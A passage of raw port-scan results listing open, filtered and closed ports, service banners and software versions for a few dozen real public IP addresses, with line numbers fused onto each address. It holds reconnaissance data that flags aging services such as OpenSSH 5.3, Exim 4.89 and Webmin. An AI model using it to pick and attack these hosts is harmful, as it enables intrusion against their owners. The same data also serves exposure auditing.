639792.123.250.35 68 udp dhcpc unknown
639892.123.250.35 69 tcp tftp filtered
639992.123.250.35 69 udp tftp unknown
640092.123.250.35 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
640192.123.250.35 88 tcp kerberos-sec filtered
640292.123.250.35 88 udp kerberos-sec unknown
640392.123.250.35 123 tcp ntp filtered
640492.123.250.35 123 udp ntp unknown
640592.123.250.35 137 tcp netbios-ns filtered
640692.123.250.35 137 udp netbios-ns unknown
640792.123.250.35 138 tcp netbios-dgm filtered
640892.123.250.35 138 udp netbios-dgm unknown
640992.123.250.35 139 tcp netbios-ssn filtered
641092.123.250.35 139 udp netbios-ssn unknown
641192.123.250.35 161 tcp snmp filtered
641292.123.250.35 161 udp snmp unknown
641392.123.250.35 162 tcp snmptrap filtered
641492.123.250.35 162 udp snmptrap unknown
641592.123.250.35 389 tcp ldap filtered
641692.123.250.35 389 udp ldap unknown
641792.123.250.35 443 tcp ssl/https open
641892.123.250.35 520 tcp efs filtered
641992.123.250.35 520 udp route unknown
642092.123.250.35 2049 tcp nfs filtered
642192.123.250.35 2049 udp nfs unknown
642292.123.250.35 8883 tcp secure-mqtt open
642392.123.250.65 53 tcp domain filtered
642492.123.250.65 53 udp domain unknown
642592.123.250.65 67 tcp dhcps filtered
642692.123.250.65 67 udp dhcps unknown
642792.123.250.65 68 tcp dhcpc filtered
642892.123.250.65 68 udp dhcpc unknown
642992.123.250.65 69 tcp tftp filtered
643092.123.250.65 69 udp tftp unknown
643192.123.250.65 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
643292.123.250.65 88 tcp kerberos-sec filtered
643392.123.250.65 88 udp kerberos-sec unknown
643492.123.250.65 123 tcp ntp filtered
643592.123.250.65 123 udp ntp unknown
643692.123.250.65 137 tcp netbios-ns filtered
643792.123.250.65 137 udp netbios-ns unknown
643892.123.250.65 138 tcp netbios-dgm filtered
643992.123.250.65 138 udp netbios-dgm unknown
644092.123.250.65 139 tcp netbios-ssn filtered
644192.123.250.65 139 udp netbios-ssn unknown
644292.123.250.65 161 tcp snmp filtered
644392.123.250.65 161 udp snmp unknown
644492.123.250.65 162 tcp snmptrap filtered
644592.123.250.65 162 udp snmptrap unknown
644692.123.250.65 389 tcp ldap filtered
644792.123.250.65 389 udp ldap unknown
644892.123.250.65 443 tcp ssl/https open
644992.123.250.65 520 tcp efs filtered
645092.123.250.65 520 udp route unknown
645192.123.250.65 2049 tcp nfs filtered
645292.123.250.65 2049 udp nfs unknown
645392.123.250.65 8883 tcp secure-mqtt open
645494.102.51.111 22 tcp ssh open
645594.102.51.111 25 tcp smtp open Exim smtpd 4.89
645694.102.51.111 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
645794.102.51.111 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
645894.102.51.111 67 tcp dhcps filtered
645994.102.51.111 67 udp dhcps unknown
646094.102.51.111 68 tcp dhcpc filtered
646194.102.51.111 68 udp dhcpc unknown
646294.102.51.111 69 tcp tftp filtered
646394.102.51.111 69 udp tftp unknown
646494.102.51.111 80 tcp http open nginx
646594.102.51.111 88 tcp kerberos-sec filtered
646694.102.51.111 88 udp kerberos-sec unknown
646794.102.51.111 110 tcp pop3 open Dovecot pop3d
646894.102.51.111 123 tcp ntp filtered
646994.102.51.111 123 udp ntp unknown
647094.102.51.111 137 tcp netbios-ns filtered
647194.102.51.111 137 udp netbios-ns unknown
647294.102.51.111 138 tcp netbios-dgm filtered
647394.102.51.111 138 udp netbios-dgm unknown
647494.102.51.111 139 tcp netbios-ssn filtered
647594.102.51.111 139 udp netbios-ssn unknown
647694.102.51.111 143 tcp imap open Dovecot imapd
647794.102.51.111 161 tcp snmp filtered
647894.102.51.111 161 udp snmp unknown
647994.102.51.111 162 tcp snmptrap filtered
648094.102.51.111 162 udp snmptrap unknown
648194.102.51.111 389 tcp ldap filtered
648294.102.51.111 389 udp ldap unknown
648394.102.51.111 465 tcp ssl/smtp open Exim smtpd 4.89
648494.102.51.111 520 tcp efs filtered
648594.102.51.111 520 udp route unknown
648694.102.51.111 993 tcp ssl/imaps open
648794.102.51.111 995 tcp ssl/pop3s open
648894.102.51.111 2049 tcp nfs filtered
648994.102.51.111 2049 udp nfs unknown
649094.102.51.112 22 tcp ssh open
649194.102.51.112 25 tcp smtp open Exim smtpd 4.89
649294.102.51.112 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
649394.102.51.112 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
649494.102.51.112 67 tcp dhcps filtered
649594.102.51.112 67 udp dhcps unknown
649694.102.51.112 68 tcp dhcpc filtered
649794.102.51.112 68 udp dhcpc unknown
649894.102.51.112 69 tcp tftp filtered
649994.102.51.112 69 udp tftp unknown
650094.102.51.112 80 tcp http open nginx
650194.102.51.112 88 tcp kerberos-sec filtered
650294.102.51.112 88 udp kerberos-sec unknown
650394.102.51.112 110 tcp pop3 open Dovecot pop3d
650494.102.51.112 123 tcp ntp filtered
650594.102.51.112 123 udp ntp unknown
650694.102.51.112 137 tcp netbios-ns filtered
650794.102.51.112 137 udp netbios-ns unknown
650894.102.51.112 138 tcp netbios-dgm filtered
650994.102.51.112 138 udp netbios-dgm unknown
651094.102.51.112 139 tcp netbios-ssn filtered
651194.102.51.112 139 udp netbios-ssn unknown
651294.102.51.112 143 tcp imap open Dovecot imapd
651394.102.51.112 161 tcp snmp filtered
651494.102.51.112 161 udp snmp unknown
651594.102.51.112 162 tcp snmptrap filtered
651694.102.51.112 162 udp snmptrap unknown
651794.102.51.112 389 tcp ldap filtered
651894.102.51.112 389 udp ldap unknown
651994.102.51.112 465 tcp ssl/smtp open Exim smtpd 4.89
652094.102.51.112 520 tcp efs filtered
652194.102.51.112 520 udp route unknown
652294.102.51.112 993 tcp ssl/imaps open
652394.102.51.112 995 tcp ssl/pop3s open
652494.102.51.112 2049 tcp nfs filtered
652594.102.51.112 2049 udp nfs unknown
6526104.244.73.40 53 udp domain unknown
6527104.244.73.40 67 udp dhcps unknown
6528104.244.73.40 68 udp dhcpc unknown
6529104.244.73.40 69 udp tftp unknown
6530104.244.73.40 88 udp kerberos-sec unknown
6531104.244.73.40 123 udp ntp unknown
6532104.244.73.40 137 udp netbios-ns unknown
6533104.244.73.40 138 udp netbios-dgm unknown
6534104.244.73.40 139 udp netbios-ssn unknown
6535104.244.73.40 161 udp snmp unknown
6536104.244.73.40 162 udp snmptrap unknown
6537104.244.73.40 389 udp ldap unknown
6538104.244.73.40 520 udp route unknown
6539104.244.73.40 2049 udp nfs unknown
6540104.244.76.231 53 tcp domain filtered
6541104.244.76.231 53 udp domain unknown
6542104.244.76.231 67 tcp dhcps filtered
6543104.244.76.231 67 udp dhcps unknown
6544104.244.76.231 68 tcp dhcpc filtered
6545104.244.76.231 68 udp dhcpc unknown
6546104.244.76.231 69 tcp tftp filtered
6547104.244.76.231 69 udp tftp unknown
6548104.244.76.231 80 tcp http open nginx
6549104.244.76.231 88 tcp kerberos-sec filtered
6550104.244.76.231 88 udp kerberos-sec unknown
6551104.244.76.231 123 tcp ntp filtered
6552104.244.76.231 123 udp ntp unknown
6553104.244.76.231 137 tcp netbios-ns filtered
6554104.244.76.231 137 udp netbios-ns unknown
6555104.244.76.231 138 tcp netbios-dgm filtered
6556104.244.76.231 138 udp netbios-dgm unknown
6557104.244.76.231 139 tcp netbios-ssn filtered
6558104.244.76.231 139 udp netbios-ssn unknown
6559104.244.76.231 161 tcp snmp filtered
6560104.244.76.231 161 udp snmp unknown
6561104.244.76.231 162 tcp snmptrap filtered
6562104.244.76.231 162 udp snmptrap unknown
6563104.244.76.231 389 tcp ldap filtered
6564104.244.76.231 389 udp ldap unknown
6565104.244.76.231 443 tcp ssl/http open nginx
6566104.244.76.231 520 tcp efs filtered
6567104.244.76.231 520 udp route unknown
6568104.244.76.231 2049 tcp nfs filtered
6569104.244.76.231 2049 udp nfs unknown
6570104.244.76.231 5040 tcp unknown closed
6571104.244.76.231 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
6572104.244.76.231 16221 tcp closed
6573104.244.76.231 23022 tcp closed
6574104.244.76.231 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6575104.244.77.188 53 tcp domain filtered
6576104.244.77.188 53 udp domain unknown
6577104.244.77.188 67 tcp dhcps filtered
6578104.244.77.188 67 udp dhcps unknown
6579104.244.77.188 68 tcp dhcpc filtered
6580104.244.77.188 68 udp dhcpc unknown
6581104.244.77.188 69 tcp tftp filtered
6582104.244.77.188 69 udp tftp unknown
6583104.244.77.188 80 tcp http open nginx
6584104.244.77.188 88 tcp kerberos-sec filtered
6585104.244.77.188 88 udp kerberos-sec unknown
6586104.244.77.188 123 tcp ntp filtered
6587104.244.77.188 123 udp ntp unknown
6588104.244.77.188 137 tcp netbios-ns filtered
6589104.244.77.188 137 udp netbios-ns unknown
6590104.244.77.188 138 tcp netbios-dgm filtered
6591104.244.77.188 138 udp netbios-dgm unknown
6592104.244.77.188 139 tcp netbios-ssn filtered
6593104.244.77.188 139 udp netbios-ssn unknown
6594104.244.77.188 161 tcp snmp filtered
6595104.244.77.188 161 udp snmp unknown
6596104.244.77.188 162 tcp snmptrap filtered
6597104.244.77.188 162 udp snmptrap unknown
6598104.244.77.188 389 tcp ldap filtered
6599104.244.77.188 389 udp ldap unknown
6600104.244.77.188 443 tcp ssl/http open nginx
6601104.244.77.188 520 tcp efs filtered
6602104.244.77.188 520 udp route unknown
6603104.244.77.188 2049 tcp nfs filtered
6604104.244.77.188 2049 udp nfs unknown
6605104.244.77.188 5040 tcp unknown closed
6606104.244.77.188 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
6607104.244.77.188 16221 tcp closed
6608104.244.77.188 23022 tcp closed
6609104.244.77.188 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6610104.244.79.89 53 tcp domain filtered
6611104.244.79.89 53 udp domain unknown
6612104.244.79.89 67 tcp dhcps filtered
6613104.244.79.89 67 udp dhcps unknown
6614104.244.79.89 68 tcp dhcpc filtered
6615104.244.79.89 68 udp dhcpc unknown
6616104.244.79.89 69 tcp tftp filtered
6617104.244.79.89 69 udp tftp unknown
6618104.244.79.89 80 tcp http open nginx
6619104.244.79.89 88 tcp kerberos-sec filtered
6620104.244.79.89 88 udp kerberos-sec unknown
6621104.244.79.89 123 tcp ntp filtered
6622104.244.79.89 123 udp ntp unknown
6623104.244.79.89 137 tcp netbios-ns filtered
6624104.244.79.89 137 udp netbios-ns unknown
6625104.244.79.89 138 tcp netbios-dgm filtered
6626104.244.79.89 138 udp netbios-dgm unknown
6627104.244.79.89 139 tcp netbios-ssn filtered
6628104.244.79.89 139 udp netbios-ssn unknown
6629104.244.79.89 161 tcp snmp filtered
6630104.244.79.89 161 udp snmp unknown
6631104.244.79.89 162 tcp snmptrap filtered
6632104.244.79.89 162 udp snmptrap unknown
6633104.244.79.89 389 tcp ldap filtered
6634104.244.79.89 389 udp ldap unknown
6635104.244.79.89 443 tcp ssl/http open nginx
6636104.244.79.89 520 tcp efs filtered
6637104.244.79.89 520 udp route unknown
6638104.244.79.89 2049 tcp nfs filtered
6639104.244.79.89 2049 udp nfs unknown
6640104.244.79.89 7910 tcp ssl/http open nginx
6641104.244.79.89 7920 tcp unknown closed
6642104.244.79.89 7930 tcp closed
6643104.244.79.89 16001 tcp http open MiniServ 1.930 Webmin httpd
6644104.244.79.89 16010 tcp ssl/http open nginx
6645104.244.79.89 16221 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6646104.244.79.89 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6647107.180.28.114 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 3 of 500 allowed.\x0d\x0a220-Local time is now 05:54. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6648107.180.28.114 22 tcp ssh open SSH-2.0-OpenSSH_5.3
6649107.180.28.114 53 tcp domain filtered
6650107.180.28.114 53 udp domain unknown
6651107.180.28.114 67 tcp dhcps filtered
6652107.180.28.114 67 udp dhcps unknown
6653107.180.28.114 68 tcp dhcpc filtered
6654107.180.28.114 68 udp dhcpc unknown
6655107.180.28.114 69 tcp tftp filtered
6656107.180.28.114 69 udp tftp unknown
6657107.180.28.114 88 tcp kerberos-sec filtered
6658107.180.28.114 88 udp kerberos-sec unknown
6659107.180.28.114 123 tcp ntp filtered
6660107.180.28.114 123 udp ntp unknown
6661107.180.28.114 137 tcp netbios-ns filtered
6662107.180.28.114 137 udp netbios-ns unknown
6663107.180.28.114 138 tcp netbios-dgm filtered
6664107.180.28.114 138 udp netbios-dgm unknown
6665107.180.28.114 139 tcp netbios-ssn filtered
6666107.180.28.114 139 udp netbios-ssn unknown
6667107.180.28.114 161 tcp snmp filtered
6668107.180.28.114 161 udp snmp unknown
6669107.180.28.114 162 tcp snmptrap filtered
6670107.180.28.114 162 udp snmptrap unknown
6671107.180.28.114 389 tcp ldap filtered
6672107.180.28.114 389 udp ldap unknown
6673107.180.28.114 520 tcp efs filtered
6674107.180.28.114 520 udp route unknown
6675107.180.28.114 2049 tcp nfs filtered
6676107.180.28.114 2049 udp nfs unknown
6677111.90.145.39 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6678111.90.145.39 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6679111.90.145.39 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6680111.90.145.39 67 tcp dhcps closed
6681111.90.145.39 67 udp dhcps closed
6682111.90.145.39 68 tcp dhcpc closed
6683111.90.145.39 68 udp dhcpc unknown
6684111.90.145.39 69 tcp tftp closed
6685111.90.145.39 69 udp tftp unknown
6686111.90.145.39 88 tcp kerberos-sec closed
6687111.90.145.39 88 udp kerberos-sec unknown
6688111.90.145.39 123 tcp ntp closed
6689111.90.145.39 123 udp ntp closed
6690111.90.145.39 137 tcp netbios-ns closed
6691111.90.145.39 137 udp netbios-ns unknown
6692111.90.145.39 138 tcp netbios-dgm closed
6693111.90.145.39 138 udp netbios-dgm unknown
6694111.90.145.39 139 tcp netbios-ssn filtered
6695111.90.145.39 139 udp netbios-ssn closed
6696111.90.145.39 161 tcp snmp closed
6697111.90.145.39 161 udp snmp unknown
6698111.90.145.39 162 tcp snmptrap closed
6699111.90.145.39 162 udp snmptrap closed
6700111.90.145.39 389 tcp ldap closed
6701111.90.145.39 389 udp ldap unknown
6702111.90.145.39 520 tcp efs closed
6703111.90.145.39 520 udp route closed
6704111.90.145.39 2049 tcp nfs closed
6705111.90.145.39 2049 udp nfs closed
6706143.95.110.248 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 150 allowed.\x0d\x0a220-Local time is now 05:55. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6707143.95.110.248 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6708143.95.110.248 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6709143.95.110.248 67 tcp dhcps closed
6710143.95.110.248 67 udp dhcps unknown
6711143.95.110.248 68 tcp dhcpc closed
6712143.95.110.248 68 udp dhcpc unknown
6713143.95.110.248 69 tcp tftp closed
6714143.95.110.248 69 udp tftp unknown
6715143.95.110.248 88 tcp kerberos-sec closed
6716143.95.110.248 88 udp kerberos-sec unknown
6717143.95.110.248 123 tcp ntp closed
6718143.95.110.248 123 udp ntp unknown
6719143.95.110.248 137 tcp netbios-ns closed
6720143.95.110.248 137 udp netbios-ns unknown
6721143.95.110.248 138 tcp netbios-dgm closed
6722143.95.110.248 138 udp netbios-dgm closed
6723143.95.110.248 139 tcp netbios-ssn closed
6724143.95.110.248 139 udp netbios-ssn unknown
6725143.95.110.248 161 tcp snmp closed
6726143.95.110.248 161 udp snmp closed
6727143.95.110.248 162 tcp snmptrap closed
6728143.95.110.248 162 udp snmptrap unknown
6729143.95.110.248 389 tcp ldap closed
6730143.95.110.248 389 udp ldap closed
6731143.95.110.248 520 tcp efs closed
6732143.95.110.248 520 udp route unknown
6733143.95.110.248 2049 tcp nfs closed
6734143.95.110.248 2049 udp nfs unknown
6735149.126.72.220 25 tcp smtp closed
6736149.126.72.220 51 tcp tcpwrapped open
6737149.126.72.220 53 tcp domain open
6738149.126.72.220 53 udp domain open
6739149.126.72.220 65 tcp tcpwrapped open
6740149.126.72.220 66 tcp tcpwrapped open
6741149.126.72.220 67 tcp dhcps filtered
6742149.126.72.220 67 udp dhcps unknown
6743149.126.72.220 68 tcp dhcpc filtered
6744149.126.72.220 68 udp dhcpc unknown
6745149.126.72.220 69 tcp tftp filtered
6746149.126.72.220 69 udp tftp unknown
6747149.126.72.220 80 tcp tcpwrapped open
6748149.126.72.220 81 tcp tcpwrapped open
6749149.126.72.220 82 tcp tcpwrapped open
6750149.126.72.220 83 tcp tcpwrapped open
6751149.126.72.220 84 tcp tcpwrapped open
6752149.126.72.220 85 tcp tcpwrapped open
6753149.126.72.220 86 tcp tcpwrapped open
6754149.126.72.220 88 tcp http open Incapsula CDN httpd
6755149.126.72.220 88 udp kerberos-sec unknown
6756149.126.72.220 89 tcp tcpwrapped open
6757149.126.72.220 90 tcp tcpwrapped open
6758149.126.72.220 91 tcp tcpwrapped open
6759149.126.72.220 92 tcp tcpwrapped open
6760149.126.72.220 98 tcp tcpwrapped open
6761149.126.72.220 99 tcp tcpwrapped open
6762149.126.72.220 123 tcp ntp filtered
6763149.126.72.220 123 udp ntp unknown
6764149.126.72.220 137 tcp netbios-ns filtered
6765149.126.72.220 137 udp netbios-ns filtered
6766149.126.72.220 138 tcp netbios-dgm filtered
6767149.126.72.220 138 udp netbios-dgm filtered
6768149.126.72.220 139 tcp netbios-ssn closed
6769149.126.72.220 139 udp netbios-ssn unknown
6770149.126.72.220 160 tcp sgmp-traps closed
6771149.126.72.220 161 tcp snmp filtered
6772149.126.72.220 161 udp snmp unknown
6773149.126.72.220 162 tcp snmptrap filtered
6774149.126.72.220 162 udp snmptrap unknown
6775149.126.72.220 189 tcp tcpwrapped open
6776149.126.72.220 190 tcp tcpwrapped open
6777149.126.72.220 192 tcp tcpwrapped open
6778149.126.72.220 243 tcp tcpwrapped open
6779149.126.72.220 285 tcp tcpwrapped open
6780149.126.72.220 314 tcp tcpwrapped open
6781149.126.72.220 343 tcp tcpwrapped open
6782149.126.72.220 347 tcp tcpwrapped open
6783149.126.72.220 385 tcp tcpwrapped open
6784149.126.72.220 389 tcp ssl/http open Incapsula CDN httpd
6785149.126.72.220 389 udp ldap unknown
6786149.126.72.220 400 tcp tcpwrapped open
6787149.126.72.220 440 tcp tcpwrapped open
6788149.126.72.220 441 tcp tcpwrapped open
6789149.126.72.220 442 tcp tcpwrapped open
6790149.126.72.220 443 tcp ssl/tcpwrapped open
6791149.126.72.220 444 tcp tcpwrapped open
6792149.126.72.220 445 tcp microsoft-ds closed
6793149.126.72.220 446 tcp tcpwrapped open
6794149.126.72.220 447 tcp tcpwrapped open
6795149.126.72.220 448 tcp tcpwrapped open
6796149.126.72.220 449 tcp tcpwrapped open
6797149.126.72.220 452 tcp tcpwrapped open
6798149.126.72.220 461 tcp tcpwrapped open
6799149.126.72.220 462 tcp tcpwrapped open
6800149.126.72.220 480 tcp tcpwrapped open
6801149.126.72.220 485 tcp tcpwrapped open
6802149.126.72.220 487 tcp tcpwrapped open
6803149.126.72.220 488 tcp tcpwrapped open
6804149.126.72.220 491 tcp tcpwrapped open
6805149.126.72.220 520 tcp efs filtered
6806149.126.72.220 520 udp route unknown
6807149.126.72.220 555 tcp tcpwrapped open
6808149.126.72.220 556 tcp tcpwrapped open
6809149.126.72.220 587 tcp tcpwrapped open
6810149.126.72.220 631 tcp tcpwrapped open
6811149.126.72.220 632 tcp tcpwrapped open
6812149.126.72.220 636 tcp tcpwrapped open
6813149.126.72.220 743 tcp tcpwrapped open
6814149.126.72.220 772 tcp tcpwrapped open
6815149.126.72.220 777 tcp tcpwrapped open
6816149.126.72.220 782 tcp tcpwrapped open
6817149.126.72.220 785 tcp tcpwrapped open
6818149.126.72.220 800 tcp tcpwrapped open
6819149.126.72.220 801 tcp tcpwrapped open
6820149.126.72.220 805 tcp tcpwrapped open
6821149.126.72.220 806 tcp tcpwrapped open
6822149.126.72.220 809 tcp tcpwrapped open
6823149.126.72.220 843 tcp tcpwrapped open
6824149.126.72.220 853 tcp tcpwrapped open
6825149.126.72.220 885 tcp tcpwrapped open
6826149.126.72.220 886 tcp tcpwrapped open
6827149.126.72.220 887 tcp tcpwrapped open
6828149.126.72.220 888 tcp tcpwrapped open
6829149.126.72.220 943 tcp tcpwrapped open
6830149.126.72.220 947 tcp tcpwrapped open
6831149.126.72.220 953 tcp tcpwrapped open
6832149.126.72.220 990 tcp tcpwrapped open
6833149.126.72.220 995 tcp tcpwrapped open
6834149.126.72.220 998 tcp tcpwrapped open
6835149.126.72.220 999 tcp tcpwrapped open
6836149.126.72.220 1000 tcp tcpwrapped open
6837149.126.72.220 1002 tcp tcpwrapped open
6838149.126.72.220 1024 tcp tcpwrapped open
6839149.126.72.220 1025 tcp tcpwrapped open
6840149.126.72.220 1028 tcp tcpwrapped open
6841149.126.72.220 1080 tcp tcpwrapped open
6842149.126.72.220 1103 tcp tcpwrapped open
6843149.126.72.220 1111 tcp tcpwrapped open
6844149.126.72.220 1180 tcp tcpwrapped open
6845149.126.72.220 1181 tcp tcpwrapped open
6846149.126.72.220 1207 tcp tcpwrapped open
6847149.126.72.220 1234 tcp tcpwrapped open
6848149.126.72.220 1250 tcp tcpwrapped open
6849149.126.72.220 1283 tcp tcpwrapped open
6850149.126.72.220 1291 tcp tcpwrapped open
6851149.126.72.220 1292 tcp tcpwrapped open
6852149.126.72.220 1293 tcp tcpwrapped open
6853149.126.72.220 1337 tcp tcpwrapped open
6854149.126.72.220 1344 tcp tcpwrapped open
6855149.126.72.220 1355 tcp tcpwrapped open
6856149.126.72.220 1364 tcp tcpwrapped open
6857149.126.72.220 1366 tcp tcpwrapped open
6858149.126.72.220 1377 tcp tcpwrapped open
6859149.126.72.220 1387 tcp tcpwrapped open
6860149.126.72.220 1388 tcp tcpwrapped open
6861149.126.72.220 1433 tcp tcpwrapped open
6862149.126.72.220 1443 tcp tcpwrapped open
6863149.126.72.220 1447 tcp tcpwrapped open
6864149.126.72.220 1450 tcp tcpwrapped open
6865149.126.72.220 1451 tcp tcpwrapped open
6866149.126.72.220 1452 tcp tcpwrapped open
6867149.126.72.220 1453 tcp tcpwrapped open
6868149.126.72.220 1454 tcp tcpwrapped open
6869149.126.72.220 1455 tcp tcpwrapped open
6870149.126.72.220 1456 tcp tcpwrapped open
6871149.126.72.220 1457 tcp tcpwrapped open
6872149.126.72.220 1458 tcp tcpwrapped open
6873149.126.72.220 1459 tcp tcpwrapped open
6874149.126.72.220 1460 tcp tcpwrapped open
6875149.126.72.220 1494 tcp tcpwrapped open
6876149.126.72.220 1935 tcp tcpwrapped open
6877149.126.72.220 1950 tcp tcpwrapped open
6878149.126.72.220 1951 tcp tcpwrapped open
6879149.126.72.220 1952 tcp tcpwrapped open
6880149.126.72.220 1953 tcp tcpwrapped open
6881149.126.72.220 1954 tcp tcpwrapped open
6882149.126.72.220 1955 tcp tcpwrapped open
6883149.126.72.220 1956 tcp tcpwrapped open
6884149.126.72.220 1957 tcp tcpwrapped open
6885149.126.72.220 1958 tcp tcpwrapped open
6886149.126.72.220 1959 tcp tcpwrapped open
6887149.126.72.220 1960 tcp tcpwrapped open
6888149.126.72.220 1964 tcp tcpwrapped open
6889149.126.72.220 1965 tcp tcpwrapped open
6890149.126.72.220 1966 tcp tcpwrapped open
6891149.126.72.220 1967 tcp tcpwrapped open
6892149.126.72.220 1968 tcp tcpwrapped open
6893149.126.72.220 1969 tcp tcpwrapped open
6894149.126.72.220 1970 tcp tcpwrapped open
6895149.126.72.220 1971 tcp tcpwrapped open
6896149.126.72.220 1972 tcp tcpwrapped open
6897149.126.72.220 1973 tcp tcpwrapped open
6898149.126.72.220 1974 tcp tcpwrapped open
6899149.126.72.220 1975 tcp tcpwrapped open
6900149.126.72.220 1976 tcp tcpwrapped open
6901149.126.72.220 1977 tcp tcpwrapped open
6902149.126.72.220 1978 tcp tcpwrapped open
6903149.126.72.220 1979 tcp tcpwrapped open
6904149.126.72.220 1980 tcp tcpwrapped open
6905149.126.72.220 1981 tcp tcpwrapped open
6906149.126.72.220 1982 tcp tcpwrapped open
6907149.126.72.220 1983 tcp tcpwrapped open
6908149.126.72.220 1984 tcp tcpwrapped open
6909149.126.72.220 1985 tcp tcpwrapped open
6910149.126.72.220 1986 tcp tcpwrapped open
6911149.126.72.220 1987 tcp tcpwrapped open
6912149.126.72.220 1988 tcp tcpwrapped open
6913149.126.72.220 1989 tcp tcpwrapped open
6914149.126.72.220 2000 tcp tcpwrapped open
6915149.126.72.220 2001 tcp tcpwrapped open
6916149.126.72.220 2006 tcp tcpwrapped open
6917149.126.72.220 2012 tcp tcpwrapped open
6918149.126.72.220 2020 tcp tcpwrapped open
6919149.126.72.220 2048 tcp tcpwrapped open
6920149.126.72.220 2049 tcp http open Incapsula CDN httpd
6921149.126.72.220 2049 udp nfs unknown
6922149.126.72.220 2050 tcp tcpwrapped open
6923149.126.72.220 2051 tcp tcpwrapped open
6924149.126.72.220 2052 tcp tcpwrapped open
6925149.126.72.220 2053 tcp tcpwrapped open
6926149.126.72.220 2054 tcp tcpwrapped open
6927149.126.72.220 2055 tcp tcpwrapped open
6928149.126.72.220 2056 tcp tcpwrapped open
6929149.126.72.220 2057 tcp tcpwrapped open
6930149.126.72.220 2058 tcp tcpwrapped open
6931149.126.72.220 2059 tcp tcpwrapped open
6932149.126.72.220 2060 tcp tcpwrapped open
6933149.126.72.220 2061 tcp tcpwrapped open
6934149.126.72.220 2062 tcp tcpwrapped open
6935149.126.72.220 2063 tcp tcpwrapped open
6936149.126.72.220 2064 tcp tcpwrapped open
6937149.126.72.220 2065 tcp tcpwrapped open
6938149.126.72.220 2066 tcp tcpwrapped open
6939149.126.72.220 2067 tcp tcpwrapped open
6940149.126.72.220 2068 tcp tcpwrapped open
6941149.126.72.220 2069 tcp tcpwrapped open
6942149.126.72.220 2070 tcp tcpwrapped open
6943149.126.72.220 2072 tcp tcpwrapped open
6944149.126.72.220 2082 tcp tcpwrapped open
6945149.126.72.220 2083 tcp tcpwrapped open
6946149.126.72.220 2087 tcp tcpwrapped open
6947149.126.72.220 2096 tcp tcpwrapped open
6948149.126.72.220 2100 tcp tcpwrapped open
6949149.126.72.220 2108 tcp tcpwrapped open
6950149.126.72.220 2200 tcp tcpwrapped open
6951149.126.72.220 2209 tcp tcpwrapped open
6952149.126.72.220 2222 tcp tcpwrapped open
6953149.126.72.220 2226 tcp tcpwrapped open
6954149.126.72.220 2248 tcp tcpwrapped open
6955149.126.72.220 2344 tcp tcpwrapped open
6956149.126.72.220 2345 tcp tcpwrapped open
6957149.126.72.220 2353 tcp tcpwrapped open
6958149.126.72.220 2363 tcp tcpwrapped open
6959149.126.72.220 2423 tcp tcpwrapped open
6960149.126.72.220 2433 tcp tcpwrapped open
6961149.126.72.220 2435 tcp tcpwrapped open
6962149.126.72.220 2443 tcp tcpwrapped open
6963149.126.72.220 2453 tcp tcpwrapped open
6964149.126.72.220 2480 tcp tcpwrapped open
6965149.126.72.220 2548 tcp tcpwrapped open
6966149.126.72.220 2549 tcp tcpwrapped open
6967149.126.72.220 2550 tcp tcpwrapped open
6968149.126.72.220 2551 tcp tcpwrapped open
6969149.126.72.220 2552 tcp tcpwrapped open
6970149.126.72.220 2553 tcp tcpwrapped open
6971149.126.72.220 2554 tcp tcpwrapped open
6972149.126.72.220 2555 tcp tcpwrapped open
6973149.126.72.220 2556 tcp tcpwrapped open
6974149.126.72.220 2557 tcp tcpwrapped open
6975149.126.72.220 2558 tcp tcpwrapped open
6976149.126.72.220 2559 tcp tcpwrapped open
6977149.126.72.220 2560 tcp tcpwrapped open
6978149.126.72.220 2561 tcp tcpwrapped open
6979149.126.72.220 2562 tcp tcpwrapped open
6980149.126.72.220 2563 tcp tcpwrapped open
6981149.126.72.220 2566 tcp tcpwrapped open
6982149.126.72.220 2567 tcp tcpwrapped open
6983149.126.72.220 2568 tcp tcpwrapped open
6984149.126.72.220 2569 tcp tcpwrapped open
6985149.126.72.220 2570 tcp tcpwrapped open
6986149.126.72.220 2572 tcp tcpwrapped open
6987149.126.72.220 2598 tcp tcpwrapped open
6988149.126.72.220 2599 tcp tcpwrapped open
6989149.126.72.220 2850 tcp tcpwrapped open
6990149.126.72.220 2985 tcp tcpwrapped open
6991149.126.72.220 2995 tcp tcpwrapped open
6992149.126.72.220 3000 tcp tcpwrapped open
6993149.126.72.220 3001 tcp tcpwrapped open
6994149.126.72.220 3002 tcp tcpwrapped open
6995149.126.72.220 3003 tcp tcpwrapped open
6996149.126.72.220 3004 tcp tcpwrapped open
